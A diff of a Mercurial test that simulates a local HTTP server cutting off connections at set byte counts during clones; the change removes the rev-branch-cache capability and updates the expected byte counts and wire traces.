readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -520,7 +521,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) 
host: localhost:$HGPORT\r\n (glob) @@ -544,7 +545,7 @@ Server stops before it sends transfer encoding - $ hg serve --config badserver.closeaftersendbytes=973 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=954 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -573,7 +574,7 @@ Server sends empty HTTP body for getbundle - $ hg serve --config badserver.closeaftersendbytes=978 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=959 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -591,17 +592,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (942) HTTP/1.1 200 Script output follows\r\n (no-py3 !) 
- write(23 from 23) -> (919) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (882) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (841) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (820) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (818) \r\n (no-py3 !) - write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (799) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (923) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (900) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (863) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (822) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (801) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (799) \r\n (no-py3 !) 
+ write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -625,7 +626,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) 
host: localhost:$HGPORT\r\n (glob) @@ -651,7 +652,7 @@ Server sends partial compression string - $ hg serve --config badserver.closeaftersendbytes=1002 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=983 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -669,17 +670,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (966) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (943) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (906) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (865) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (844) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (842) \r\n (no-py3 !) 
- write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (823) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (947) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (924) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (887) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (846) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (825) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (823) \r\n (no-py3 !) + write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) 
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -702,7 +703,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) 
host: localhost:$HGPORT\r\n (glob) @@ -733,7 +734,7 @@ Server sends partial bundle2 header magic - $ hg serve --config badserver.closeaftersendbytes=999 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=980 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -778,7 +779,7 @@ Server sends incomplete bundle2 stream params length - $ hg serve --config badserver.closeaftersendbytes=1008 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=989 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -825,7 +826,7 @@ Servers stops after bundle2 stream params header - $ hg serve --config badserver.closeaftersendbytes=1011 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=992 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -871,7 +872,7 @@ Server stops sending after bundle2 part header length - $ hg serve --config badserver.closeaftersendbytes=1020 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1001 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -920,7 +921,7 @@ Server stops sending after bundle2 part header - $ hg serve --config badserver.closeaftersendbytes=1067 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1048 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -973,7 +974,7 @@ Server stops after bundle2 part payload chunk size - $ hg serve --config badserver.closeaftersendbytes=1088 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1069 -p $HGPORT -d 
--pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1029,7 +1030,7 @@ Server stops sending in middle of bundle2 payload chunk - $ hg serve --config badserver.closeaftersendbytes=1549 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1530 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1086,7 +1087,7 @@ Server stops sending after 0 length payload chunk size - $ hg serve --config badserver.closeaftersendbytes=1580 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1561 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1148,8 +1149,7 @@ Server stops sending after 0 part bundle part header (indicating end of bundle2 payload) This is before the 0 size chunked transfer part that signals end of HTTP response. -# $ hg serve --config badserver.closeaftersendbytes=1755 -p $HGPORT -d --pid-file=hg.pid -E error.log - $ hg serve --config badserver.closeaftersendbytes=1862 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1736 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1165,25 +1165,20 @@ $ killdaemons.py $DAEMON_PIDS #if py36 - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -25 - sendall(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - sendall(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - sendall(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - sendall(473 from 473) -> (313) 
1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - sendall(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - sendall(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - sendall(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - sendall(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - sendall(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 
namespacebookmarks\\r\\n (esc) - sendall(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - sendall(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - sendall(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -20 + sendall(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + sendall(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + sendall(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + sendall(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 
0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + sendall(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + sendall(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + sendall(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + sendall(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + sendall(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) sendall(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write limit reached; closing socket @@ -1193,25 +1188,20 @@ #else - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26 - write(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - write(47 from 47) -> (795) 
29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - write(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - write(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - write(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - write(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - write(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - write(9 from 9) -> (175) 
